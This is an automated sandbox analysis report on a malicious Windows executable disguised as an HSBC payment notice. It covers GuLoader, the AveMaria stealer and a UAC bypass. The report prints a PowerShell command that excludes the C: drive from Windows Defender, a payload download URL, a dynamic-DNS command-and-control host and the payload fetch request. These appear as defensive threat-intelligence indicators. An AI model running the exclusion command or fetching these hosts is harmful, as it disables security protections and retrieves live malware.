Windows Analysis Report HSBC Payment Advice.exe

Overview

General Information

Sample Name: HSBC Payment Advice.exe
Analysis ID: 528768
MD5: a069e61b357f625a7b3595150412c42d
SHA1: 5fa560d04b13db7e0216bda2ca5f1c3b94a8912e
SHA256: 0fb47a47bc025991b3ed8895aa84030def6e5cc538a9cec279a73f4528d549c6
Tags: exe, HSBC, signed
Detection

GuLoader AveMaria UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • HSBC Payment Advice.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
    • HSBC Payment Advice.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
      • powershell.exe (PID: 7140 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • images.exe (PID: 6136 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
        • images.exe (PID: 5216 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth |
  • 0x1cc30:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x1cc30:$c1: Elevation:Administrator!new:
0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security |
0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth |
  • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth |
  • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xd80:$c1: Elevation:Administrator!new:
12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security |
12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security |
12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth |
  • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}

Sigma Overview

System Summary:

Sigma detected: Powershell Defender Exclusion
Source: Process started, Author: Florian Roth, Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe" , ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe" , ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
Sigma detected: T1086 PowerShell Execution
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132823686502527122.7140.DefaultAppDomain.powershell

              Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}
Multi AV Scanner detection for submitted file
Source: HSBC Payment Advice.exe, Virustotal: Detection: 56%
Source: HSBC Payment Advice.exe, Metadefender: Detection: 20%
Source: HSBC Payment Advice.exe, ReversingLabs: Detection: 48%
Yara detected AveMaria stealer
Source: Yara match, File source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: spuredge.com, Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\images.exe, Virustotal: Detection: 56%
Source: C:\ProgramData\images.exe, Metadefender: Detection: 20%
Source: C:\ProgramData\images.exe, ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: HSBC Payment Advice.exe, Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\ProgramData\images.exe, Joe Sandbox ML: detected
Source: 12.0.HSBC Payment Advice.exe.400000.1.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 12.0.HSBC Payment Advice.exe.400000.3.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 28.0.images.exe.400000.0.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 12.0.HSBC Payment Advice.exe.400000.0.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 28.0.images.exe.400000.1.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.HSBC Payment Advice.exe.400000.0.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 21.2.images.exe.400000.0.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 21.0.images.exe.400000.0.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 0.2.HSBC Payment Advice.exe.400000.0.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 12.0.HSBC Payment Advice.exe.400000.2.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 28.0.images.exe.400000.2.unpack, Avira: Label: TR/Dropper.VB.Gen
Source: 28.0.images.exe.400000.3.unpack, Avira: Label: TR/Dropper.VB.Gen

              Exploits:

              Yara detected UACMe UAC Bypass tool
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Source: HSBC Payment Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49823 version: TLS 1.2
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe, Directory created: C:\Program Files\Microsoft DN1

              Networking:

              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://spuredge.com/warzone_JBBOxCEy72.bin
              Uses dynamic DNS services
              Source: unknownDNS query: name: barr2.ddns.net
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: HSBC Payment Advice.exe, 0000000C.00000003.502726009.0000000001B35000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501873155.0000000001B34000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498183760.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.509729103.0000000001B35000.00000004.00000020.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498385567.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmpString found in binary or memory: https://spuredge.com/warzone_JBBOxCEy72.bin
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownDNS traffic detected: queries for: spuredge.com
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

              E-Banking Fraud:

              Yara detected AveMaria stealer
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY

              System Summary:

              Potential malicious icon found
              Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
              Malicious sample detected (through community Yara rule)
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: HSBC Payment Advice.exe
              Executable has a suspicious name (potential lure to open the executable)
              Source: HSBC Payment Advice.exeStatic file information: Suspicious name
              Source: HSBC Payment Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: C:\ProgramData\images.exeCode function: 28_2_017A95F9 NtAllocateVirtualMemory,28_2_017A95F9
              Source: C:\ProgramData\images.exeCode function: 28_2_017AEB88 NtProtectVirtualMemory,28_2_017AEB88
              Source: C:\ProgramData\images.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess Stats: CPU usage > 98%
              Source: HSBC Payment Advice.exe, 00000000.00000000.245504475.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000000.376134620.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000002.517452791.000000001F0E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exeBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: images.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: HSBC Payment Advice.exeStatic PE information: invalid certificate
              Source: HSBC Payment Advice.exeVirustotal: Detection: 56%
              Source: HSBC Payment Advice.exeMetadefender: Detection: 20%
              Source: HSBC Payment Advice.exeReversingLabs: Detection: 48%
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe, File read: C:\Users\user\Desktop\HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
              Source: C:\ProgramData\images.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
              Source: unknownProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe File created: C:\Users\user\AppData\Local\Microsoft Vision\
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoahsjv.1ht.ps1
              Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@10/6@3/1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_01
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe File created: C:\Program Files\Microsoft DN1
